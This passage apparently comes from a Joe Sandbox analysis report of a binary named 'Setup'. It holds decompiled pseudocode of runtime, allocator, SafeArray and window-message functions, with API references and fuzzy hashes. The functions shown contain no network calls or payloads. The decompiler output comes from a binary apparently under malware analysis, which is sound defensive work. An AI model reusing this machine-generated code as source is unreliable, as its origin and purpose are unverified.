                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t30;
                                                                                                                                                              				intOrPtr _t49;
                                                                                                                                                              				signed int _t72;
                                                                                                                                                              				void* _t73;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x513a90);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t49);
                                                                                                                                                              				_t30 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t30 ^ _t72);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t73 - 0x18;
                                                                                                                                                              				_v44 = _t49;
                                                                                                                                                              				_v28 = E00409480(_v44 + 1, 1);
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v32 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00415110(_v28),  &_v32);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v36 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E0042AE30(_v28),  &_v36);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				_v40 = 0;
                                                                                                                                                              				E0041EB00(_v44 + 2, E00441910(_v28),  &_v40);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				 *((char*)(E00409110(_v28))) = 1;
                                                                                                                                                              				 *((char*)(E00408710(_v28))) = 0;
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _v28;
                                                                                                                                                              			}

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: 183301c742978be363bb8f1ab9b5ad5b5f802a6ff89599c1fb827626f1d6cb57
                                                                                                                                                              • Instruction ID: d27aea2102528378556eafdc0d2e7e9f5c29ea9e3cc09582983b0eac876c7694
                                                                                                                                                              • Opcode Fuzzy Hash: 183301c742978be363bb8f1ab9b5ad5b5f802a6ff89599c1fb827626f1d6cb57
                                                                                                                                                              • Instruction Fuzzy Hash: 22310BB1D001099BDB04DF99D852BEFBBB8EF48318F14052EE505B7282D7396A44CBA6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E00422B60(void* __eflags, char _a4, char _a8, intOrPtr _a12) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                              				void* __ecx;
                                                                                                                                                              				signed int _t25;
                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                              				signed int _t62;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x5182e0);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_push(_t41);
                                                                                                                                                              				_t25 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_push(_t25 ^ _t62);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v20 = _t63 - 0xc;
                                                                                                                                                              				_v32 = _t41;
                                                                                                                                                              				_v28 = E00422D30(_v32, 1);
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E0041EB00(_v32 + 1, E00415110(_v28),  &_a4);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				E0041EB00(_v32 + 1, E0042AE30(_v28),  &_a8);
                                                                                                                                                              				_v24 = _v24 + 1;
                                                                                                                                                              				E00422D70(_v32 + 2, E00441910(_v28), _a12);
                                                                                                                                                              				_v8 = 0xffffffff;
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return _v28;
                                                                                                                                                              			}















                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: allocator
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3447690668-0
                                                                                                                                                              • Opcode ID: b6545de2f7bb57edffc094cb94e14e572292e9e9844fe40a7b740aeed0028dc7
                                                                                                                                                              • Instruction ID: a4b0708774b16f10b9a70ec2a5b46f27dd21e2dd8c1498d4e535dd292540d1e2
                                                                                                                                                              • Opcode Fuzzy Hash: b6545de2f7bb57edffc094cb94e14e572292e9e9844fe40a7b740aeed0028dc7
                                                                                                                                                              • Instruction Fuzzy Hash: 94216DB1E00109AFCB04DF99D852BEFB7B8FB44318F10462EE515A7381D6396A05CBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SafeArrayDestroy.OLEAUT32 ref: 00496867
                                                                                                                                                              • SafeArrayCreate.OLEAUT32(00000000,00000001,00000000), ref: 004968A6
                                                                                                                                                              • SafeArrayLock.OLEAUT32(00000000), ref: 004968CB
                                                                                                                                                              • SafeArrayUnlock.OLEAUT32(00000000), ref: 004968FF
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ArraySafe$CreateDestroyLockUnlock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2416500753-0
                                                                                                                                                              • Opcode ID: 777d77ee4ad11ff50700f991434bcc46e04ff0b75a31c979a6979b00de7a2f9e
                                                                                                                                                              • Instruction ID: 92761eab0e97011eb67d24bdfacb91ac975fb1fd29a295b39c674a0cf9b6101b
                                                                                                                                                              • Opcode Fuzzy Hash: 777d77ee4ad11ff50700f991434bcc46e04ff0b75a31c979a6979b00de7a2f9e
                                                                                                                                                              • Instruction Fuzzy Hash: 3C31A0B8A00208EFDB04DF94C484B9EFBB5FB49304F10C5AAE8259B344C739AA85CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E0045B06B(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				signed int _t13;
                                                                                                                                                              				intOrPtr _t28;
                                                                                                                                                              				void* _t29;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              
                                                                                                                                                              				_t30 = __eflags;
                                                                                                                                                              				_t26 = __edi;
                                                                                                                                                              				_t25 = __edx;
                                                                                                                                                              				_t22 = __ebx;
                                                                                                                                                              				_push(0xc);
                                                                                                                                                              				_push(0x544598);
                                                                                                                                                              				E00456860(__ebx, __edi, __esi);
                                                                                                                                                              				_t28 = E00457400(__ebx, __edx, __edi, _t30);
                                                                                                                                                              				_t13 =  *0x56195c; // 0xfffffffe
                                                                                                                                                              				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                                              					L6:
                                                                                                                                                              					E00457DFC(_t22, 0xc);
                                                                                                                                                              					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                              					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                              					_t26 =  *0x561a40; // 0x561968
                                                                                                                                                              					 *((intOrPtr*)(_t29 - 0x1c)) = E0045B02D(_t8, _t26);
                                                                                                                                                              					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                              					E0045B0D5();
                                                                                                                                                              				} else {
                                                                                                                                                              					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                              					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                              						goto L6;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t28 =  *((intOrPtr*)(E00457400(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                              					E00457948(_t25, _t26, 0x20);
                                                                                                                                                              				}
                                                                                                                                                              				return E004568A5(_t28);
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • __getptd.LIBCMT ref: 0045B077
                                                                                                                                                                • Part of subcall function 00457400: __getptd_noexit.LIBCMT ref: 00457403
                                                                                                                                                                • Part of subcall function 00457400: __amsg_exit.LIBCMT ref: 00457410
                                                                                                                                                              • __getptd.LIBCMT ref: 0045B08E
                                                                                                                                                              • __amsg_exit.LIBCMT ref: 0045B09C
                                                                                                                                                              • __lock.LIBCMT ref: 0045B0AC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3521780317-0
                                                                                                                                                              • Opcode ID: 900689175a814712c8bda9ebad6ca019b4626c4ef11eaf7f3bb20ddfba0632f0
                                                                                                                                                              • Instruction ID: cf4d89301f3c682c8d0dc1743faf2835190ae46168d4196da046f649daa6c5b0
                                                                                                                                                              • Opcode Fuzzy Hash: 900689175a814712c8bda9ebad6ca019b4626c4ef11eaf7f3bb20ddfba0632f0
                                                                                                                                                              • Instruction Fuzzy Hash: 85F06D319416048BD721BB6AD4027AF73A0AF00B2AF51451FEC609B2D3CB7C980D9A9A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0041E590(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                              				E0041EA20(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
                                                                                                                                                              				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				 *((intOrPtr*)(_v8 + 8)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				_t21 = E00433720(_v8);
                                                                                                                                                              				 *_t21 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				return _t21;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: 2178110c97017f37eb87d8c9e6f3738af049dcf08290f1205e57e1a0d3705f4f
                                                                                                                                                              • Instruction ID: affb03b290b1aa2b73d149a340fe72a2a10df3c9f816c2c17cb8d834609de070
                                                                                                                                                              • Opcode Fuzzy Hash: 2178110c97017f37eb87d8c9e6f3738af049dcf08290f1205e57e1a0d3705f4f
                                                                                                                                                              • Instruction Fuzzy Hash: AAF04C74A00108EFC708DF95D69299DB7F6EF89304B2181EDD4095B365DB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00421880(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                              				E00421DA0(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
                                                                                                                                                              				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				 *((intOrPtr*)(_v8 + 8)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				_t21 = E00433720(_v8);
                                                                                                                                                              				 *_t21 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				return _t21;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: 77c2a6123a5c4162045a07c778d73c785a649a9c5d2f507694f46f5a09e040ea
                                                                                                                                                              • Instruction ID: 20c62e239c44e157093105c07a3df5977072132efcbc44a26de87df081af60f6
                                                                                                                                                              • Opcode Fuzzy Hash: 77c2a6123a5c4162045a07c778d73c785a649a9c5d2f507694f46f5a09e040ea
                                                                                                                                                              • Instruction Fuzzy Hash: E9F09774A00108EFCB08DF85D69299EB7F6EF89308B2081EDE4095B361CB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00427A00(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                              				E00427A90(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
                                                                                                                                                              				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				 *((intOrPtr*)(_v8 + 8)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				_t21 = E00433720(_v8);
                                                                                                                                                              				 *_t21 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				return _t21;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: 058c4132b1a2911cdff3fd2950bd61988e7a0331b9e35a95fdb7eae25e5ade2c
                                                                                                                                                              • Instruction ID: d27608f839234f1b45ce34bf94b10c3913806d25348b452ac4f55446c31f5687
                                                                                                                                                              • Opcode Fuzzy Hash: 058c4132b1a2911cdff3fd2950bd61988e7a0331b9e35a95fdb7eae25e5ade2c
                                                                                                                                                              • Instruction Fuzzy Hash: 88F09774A00108EFCB08DF85D69299EB7F6EF89308B2081EDE4095B361CB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0043BB40(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                              				E0043BDD0(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
                                                                                                                                                              				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				 *((intOrPtr*)(_v8 + 8)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				_t21 = E00433720(_v8);
                                                                                                                                                              				 *_t21 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				return _t21;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: d61e40b3ab140962dc54a35959aec621d71b70ce22b9f05a6b6e4c174653fd73
                                                                                                                                                              • Instruction ID: bede86a7c527bf71af5b54a7d38cf01d07793778824e641ca2ebc1a4e5ffed0c
                                                                                                                                                              • Opcode Fuzzy Hash: d61e40b3ab140962dc54a35959aec621d71b70ce22b9f05a6b6e4c174653fd73
                                                                                                                                                              • Instruction Fuzzy Hash: 04F03474A00108EFCB08DF95D69299EB7B6EF89308F2181ADE4095B365DB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0041FDB0(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                              				E00420210(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
                                                                                                                                                              				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				 *((intOrPtr*)(_v8 + 8)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				_t21 = E00433720(_v8);
                                                                                                                                                              				 *_t21 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				return _t21;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: b09d8c182e7baa18f3921ea0d51b61e6a8fe6aa702b685056a05800423826f4c
                                                                                                                                                              • Instruction ID: fbd9ff186e58c51dc107a68727a9d9793a67c5f80205da66d1e4463b3b109a50
                                                                                                                                                              • Opcode Fuzzy Hash: b09d8c182e7baa18f3921ea0d51b61e6a8fe6aa702b685056a05800423826f4c
                                                                                                                                                              • Instruction Fuzzy Hash: 2EF07974A00108EFC708DF85D69295DB7F5AF89304B2081EDD4095B361CB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00408EF0(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                              				E00409120(_v8, __eflags,  *((intOrPtr*)(E0041D410(_v8))));
                                                                                                                                                              				 *((intOrPtr*)(E0041D410(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				 *((intOrPtr*)(_v8 + 8)) = 0;
                                                                                                                                                              				 *((intOrPtr*)(E00433680(_v8))) =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				_t21 = E00433720(_v8);
                                                                                                                                                              				 *_t21 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                              				return _t21;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Handle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2519475695-0
                                                                                                                                                              • Opcode ID: 440d436155544bdce126e099541bc9f9b1c1a964b5ec4327e277697f2254fd46
                                                                                                                                                              • Instruction ID: eb08f18632993118ca8a3c89ccbe7ac1e294b481177aceddd8f570f870356ca5
                                                                                                                                                              • Opcode Fuzzy Hash: 440d436155544bdce126e099541bc9f9b1c1a964b5ec4327e277697f2254fd46
                                                                                                                                                              • Instruction Fuzzy Hash: C7F04C74A00108EFCB08DF95D69295DB7F5EF89304B2181EDD4095B365DB35AF01DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040C210(struct HWND__* __ecx, signed int _a4, signed int _a8, long _a12, intOrPtr* _a16) {
                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				long _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				char _v24;
                                                                                                                                                              				char _v28;
                                                                                                                                                              				struct HWND__* _v32;
                                                                                                                                                              				signed int _v36;
                                                                                                                                                              				signed int _v40;
                                                                                                                                                              				intOrPtr* _v44;
                                                                                                                                                              
                                                                                                                                                              				_v32 = __ecx;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v36 = _a4;
                                                                                                                                                              				if(_v36 > 0x39) {
                                                                                                                                                              					if(_v36 > 0x115) {
                                                                                                                                                              						if(_v36 < 0x132) {
                                                                                                                                                              							L35:
                                                                                                                                                              							if(_v8 != 0) {
                                                                                                                                                              								if(( *(_v32 + 0x98) >> 0x00000003 & 0x00000001) == 0) {
                                                                                                                                                              									return SendMessageW(_v8, _a4 + 0x2000, _a8, _a12);
                                                                                                                                                              								}
                                                                                                                                                              								_v20 = 0;
                                                                                                                                                              								if(( *(_v32 + 0x98) & 0x00000001) != 0 && E0041D530(_v32 + 0x74) != 0) {
                                                                                                                                                              									_v44 = E0041D530(_v32 + 0x74);
                                                                                                                                                              									 *((intOrPtr*)( *((intOrPtr*)( *_v44 + 0x24))))(_v44, _a4 + 0x2000, _a8, _a12,  &_v20);
                                                                                                                                                              								}
                                                                                                                                                              								return _v20;
                                                                                                                                                              							}
                                                                                                                                                              							 *_a16 = 0;
                                                                                                                                                              							return 1;
                                                                                                                                                              						}
                                                                                                                                                              						if(_v36 <= 0x138) {
                                                                                                                                                              							_v8 = _a12;
                                                                                                                                                              							goto L35;
                                                                                                                                                              						}
                                                                                                                                                              						if(_v36 == 0x210) {
                                                                                                                                                              							E0040C190(_v32);
                                                                                                                                                              							_v40 = _a8 & 0xffff;
                                                                                                                                                              							if(_v40 <= 0) {
                                                                                                                                                              								L21:
                                                                                                                                                              								_v8 = E0041D530(E0040C1E0(_v32 + 4,  &_v24, _a8 >> 0x00000010 & 0xffff));
                                                                                                                                                              								L22:
                                                                                                                                                              								goto L35;
                                                                                                                                                              							}
                                                                                                                                                              							if(_v40 <= 2) {
                                                                                                                                                              								_v8 = _a12;
                                                                                                                                                              								goto L22;
                                                                                                                                                              							}
                                                                                                                                                              							goto L21;
                                                                                                                                                              						}
                                                                                                                                                              						goto L35;
                                                                                                                                                              					}
                                                                                                                                                              					if(_v36 >= 0x114) {
                                                                                                                                                              						L33:
                                                                                                                                                              						_v8 = _a12;
                                                                                                                                                              					} else {
                                                                                                                                                              						if(_v36 == 0x4e) {
                                                                                                                                                              							_v8 =  *_a12;
                                                                                                                                                              						} else {
                                                                                                                                                              							if(_v36 == 0x111) {
                                                                                                                                                              								if(_a12 != 0) {
                                                                                                                                                              									_v8 = _a12;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L35;
                                                                                                                                                              				}
                                                                                                                                                              				if(_v36 == 0x39) {
                                                                                                                                                              					_v8 =  *((intOrPtr*)(_a12 + 8));
                                                                                                                                                              					goto L35;
                                                                                                                                                              				}
                                                                                                                                                              				_v36 = _v36 - 0x2b;
                                                                                                                                                              				if(_v36 > 4) {
                                                                                                                                                              					goto L35;
                                                                                                                                                              				}
                                                                                                                                                              				switch( *((intOrPtr*)(_v36 * 4 +  &M0040C44C))) {
                                                                                                                                                              					case 0:
                                                                                                                                                              						__eax = _a12;
                                                                                                                                                              						_v12 = _a12;
                                                                                                                                                              						__ecx = _v12;
                                                                                                                                                              						if(__ecx->i == 1) {
                                                                                                                                                              							__ecx = _v12;
                                                                                                                                                              							__edx =  *(__ecx + 0x14);
                                                                                                                                                              							if(IsWindow( *(__ecx + 0x14)) != 0) {
                                                                                                                                                              								__eax = _v12;
                                                                                                                                                              								__ecx =  *(_v12 + 0x14);
                                                                                                                                                              								_v8 = __ecx;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							__edx = _v12;
                                                                                                                                                              							__eax =  *(__edx + 0x14);
                                                                                                                                                              							_v8 =  *(__edx + 0x14);
                                                                                                                                                              						}
                                                                                                                                                              						goto L35;
                                                                                                                                                              					case 1:
                                                                                                                                                              						__edx = _a12;
                                                                                                                                                              						_v16 = _a12;
                                                                                                                                                              						__eax = _v16;
                                                                                                                                                              						if( *_v16 != 1) {
                                                                                                                                                              							__ecx = _v16;
                                                                                                                                                              							__edx =  *(_v16 + 4);
                                                                                                                                                              							__eax =  &_v28;
                                                                                                                                                              							__ecx = _v32;
                                                                                                                                                              							__ecx = _v32 + 4;
                                                                                                                                                              							__ecx = E0040C1E0(_v32 + 4,  &_v28,  *(_v16 + 4));
                                                                                                                                                              							_v8 = E0041D530(__ecx);
                                                                                                                                                              						}
